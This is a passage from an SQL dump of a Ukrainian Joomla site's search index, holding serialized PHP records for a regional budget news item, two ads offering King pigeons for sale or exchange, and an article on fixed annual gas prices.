10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"2\";s:8:\"ordering\";s:1:\"1\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:96:\"2508:vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-2-misyatsi-2021-roku\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:108:\"/8-novini-2/2508-vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-2-misyatsi-2021-roku\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2508\";s:5:\"route\";s:149:\"index.php?option=com_content&view=article&id=2508:vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-2-misyatsi-2021-roku&catid=8\";s:5:\"title\";s:54:\"Результати за 3 місяці 2021 року\";s:11:\"description\";s:93:\" За даними Департаменту фінансів Житмирської ОДА . \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-03-21 08:49:35\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-03-21 08:49:35\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4839,'index.php?option=com_content&view=article&id=2517','index.php?option=com_content&view=article&id=2517:golub-king&catid=127','Голуб кінг',' Пропоную коричневого самця 2019 року або обмін на самку. Є можливість передати маршрутками в Київ, Житомир, Радомишль, Коростишів, Бердичів, Вінницю, Овруч. Дзвоніть - домовимось, тел/viber: 0508320922 ','2021-04-18 18:48:33','6899370be66e7f87d4e1f9c33a4095f1',1,1,1,'*','2021-04-18 15:43:14','0000-00-00 00:00:00','2021-04-18 15:43:14','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2517\";s:5:\"alias\";s:10:\"golub-king\";s:7:\"summary\";s:857:\"<p style=\"text-align: left;\"><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/IMG_20210418_172952_tigr.jpg\"><img alt=\"\" class=\"fr-fil fr-dib\" src=\"https://malehus.in.ua/images/stories/IMG_20210418_172952_tigr.jpg\" width=\"417\"></a><strong>Пропоную коричневого самця 2019 року або обмін на самку.<br>Є можливість передати маршрутками в Київ, Житомир, Радомишль, Коростишів, Бердичів, Вінницю, Овруч.<br>Дзвоніть - домовимось, тел/viber:&nbsp; 0508320922</strong><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/IMG_20210418_172612.jpg\"><img alt=\"\" class=\"fr-image-dropped fr-fir fr-dii\" src=\"https://malehus.in.ua/images/stories/IMG_20210418_172612.jpg\" width=\"422\"></a><!--EndFragment--></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"127\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-04-18 15:48:33\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"2\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:10:\"Кінги\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:15:\"2517:golub-king\";s:7:\"catslug\";s:9:\"127:kinhy\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:29:\"/holuby/kinhy/2517-golub-king\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:10:\"Кінги\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Кінги\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2517\";s:5:\"route\";s:70:\"index.php?option=com_content&view=article&id=2517:golub-king&catid=127\";s:5:\"title\";s:19:\"Голуб кінг\";s:11:\"description\";s:348:\" Пропоную коричневого самця 2019 року або обмін на самку. Є можливість передати маршрутками в Київ, Житомир, Радомишль, Коростишів, Бердичів, Вінницю, Овруч. Дзвоніть - домовимось, тел/viber: 0508320922 \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-04-18 15:43:14\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-04-18 15:43:14\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4847,'index.php?option=com_content&view=article&id=2518','index.php?option=com_content&view=article&id=2518:king-samochka-osinnya&catid=127','Кінг самочка осіння',' Пропоную самочку кінга осінню. Є можливість передати маршрутками в Київ, Житомир, Радомишль, Коростишів, Бердичів, Вінницю, Овруч. Дзвоніть домовимось. 0508320922 ','2021-04-18 19:02:40','b61cc96d477c7e41481358e3d85d1743',1,1,1,'*','2021-04-18 15:55:39','0000-00-00 00:00:00','2021-04-18 15:55:39','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2518\";s:5:\"alias\";s:21:\"king-samochka-osinnya\";s:7:\"summary\";s:594:\"<!--StartFragment--><p style=\"text-align: left;\"><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/IMG_20210418_17328788709_tigr.jpg\"><img alt=\"\" class=\"fr-fil fr-dib\" src=\"https://malehus.in.ua/images/stories/IMG_20210418_17328788709_tigr.jpg\" width=\"750\"></a></p><p>Пропоную самочку кінга осінню. Є можливість передати маршрутками в Київ, Житомир, Радомишль, Коростишів, Бердичів, Вінницю, Овруч.</p><p> Дзвоніть домовимось. 0508320922</p><!--EndFragment-->\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"127\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-04-18 16:02:40\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"8\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:10:\"Кінги\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:26:\"2518:king-samochka-osinnya\";s:7:\"catslug\";s:9:\"127:kinhy\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:40:\"/holuby/kinhy/2518-king-samochka-osinnya\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:10:\"Кінги\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Кінги\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2518\";s:5:\"route\";s:81:\"index.php?option=com_content&view=article&id=2518:king-samochka-osinnya&catid=127\";s:5:\"title\";s:36:\"Кінг самочка осіння\";s:11:\"description\";s:289:\" Пропоную самочку кінга осінню. Є можливість передати маршрутками в Київ, Житомир, Радомишль, Коростишів, Бердичів, Вінницю, Овруч. Дзвоніть домовимось. 0508320922 \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-04-18 15:55:39\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-04-18 15:55:39\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4849,'index.php?option=com_content&view=article&id=2519','index.php?option=com_content&view=article&id=2519:richna-fiksovana-tsina-na-gaz-uzhe-vipravdovue-sebe&catid=8','Річна фіксована ціна на газ уже виправдовує себе',' Попри завершення опалювального сезону газ у Європі лише дорожчає. На таку незвичну для літа тенденцію впливають пожвавлення економіки, низькі запаси палива в сховищах, а також російський Газпром, який штучно створює дефіцит газу на європейському ринку, обмежуючи обсяги постачання. У середньому ціни на газ у Європі на початок червня сягали 25,9 євро/МВт-год, що трохи більше за $270 за тисячу кубометрів. Таким чином, ринкова ціна за кубометр газу в червні сягає майже 12 грн за кубометр. Проте ціну в майже 12 грн за кубометр споживачі не платитимуть! Адже як базова діє річна, фіксована ціна. У Нафтогазу вона складає 7,96 грн за кубометр. Річні ціни решти компаній коливаються від 7,80 грн до 13,50 грн за кубометр. Перелік усіх пропозицій можна переглянути в огляді ГазПравди: https://gazpravda.com.ua/novyny/vid-7-80-i-do-13-50-hrn-za-kubometr-postachalnyky-opryliudnyly-svizhi-tsinnyky-na-haz. Базова річна ціна зафіксована на рік і не змінюється навіть за умов підвищення цін на європейських хабах і сезонних коливань. Підключення ж до тарифного плану «Місячний» відбувається ЛИШЕ за бажанням клієнта. У даному випадку споживачам справді вигідно залишатися нарічних базових пропозиціях. Але вже в липні більшість компаній обіцяють презентувати свої сезонні та альтернативні річні продукти – наприклад, із рівними помісячними проплатами. ГазПравда вже чекає на різні, конкурентні пропозиції та підготує спеціальний огляд сезонних цін, аби споживачі могли обрати для себе найкращий варіант. https://gazpravda.com.ua/ ','2021-06-17 21:42:16','c991f1365b907c7f250258c52aace7fb',1,1,1,'*','2021-06-17 18:42:16','0000-00-00 00:00:00','2021-06-17 18:42:16','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2519\";s:5:\"alias\";s:51:\"richna-fiksovana-tsina-na-gaz-uzhe-vipravdovue-sebe\";s:7:\"summary\";s:3093:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/0053333.gif\"><img src=\"https://malehus.in.ua/images/stories/0053333.gif\" alt=\"\" class=\"fr-dii fr-fin\"></a>Попри завершення опалювального  сезону газ у Європі лише дорожчає. На таку незвичну для літа тенденцію  впливають пожвавлення економіки, низькі запаси палива в сховищах, а також  російський Газпром, який штучно створює дефіцит газу на європейському ринку, обмежуючи  обсяги постачання.</p><p><strong>У середньому ціни на газ у  Європі на початок червня сягали 25,9  євро/МВт-год, що трохи більше за $270 за тисячу кубометрів.</strong></p><p>Таким чином, ринкова ціна за  кубометр газу в червні сягає майже 12 грн за кубометр.</p><p>Проте ціну в майже 12 грн за  кубометр споживачі не платитимуть! Адже як базова діє річна, фіксована ціна. У  Нафтогазу вона складає 7,96 грн за кубометр. Річні ціни решти компаній  коливаються від 7,80 грн до 13,50 грн за кубометр. Перелік усіх пропозицій  можна переглянути в огляді ГазПравди: <a href=\"https://gazpravda.com.ua/novyny/vid-7-80-i-do-13-50-hrn-za-kubometr-postachalnyky-opryliudnyly-svizhi-tsinnyky-na-haz.\">https://gazpravda.com.ua/novyny/vid-7-80-i-do-13-50-hrn-za-kubometr-postachalnyky-opryliudnyly-svizhi-tsinnyky-na-haz.</a></p><p>Базова річна ціна зафіксована  на рік і не змінюється навіть за умов підвищення цін на європейських хабах і  сезонних коливань.</p><p>Підключення ж до тарифного  плану «Місячний» відбувається <strong>ЛИШЕ</strong> за бажанням клієнта. У даному випадку  споживачам справді вигідно залишатися на річних базових пропозиціях.</p><p>Але вже в липні більшість  компаній обіцяють презентувати свої сезонні та альтернативні річні продукти –  наприклад, із рівними помісячними проплатами. ГазПравда вже чекає на різні,  конкурентні пропозиції та підготує спеціальний огляд сезонних цін, аби  споживачі могли обрати для себе найкращий варіант.</p><p><a href=\"https://gazpravda.com.ua/\">https://gazpravda.com.ua/</a><br></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-06-17 18:42:16\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"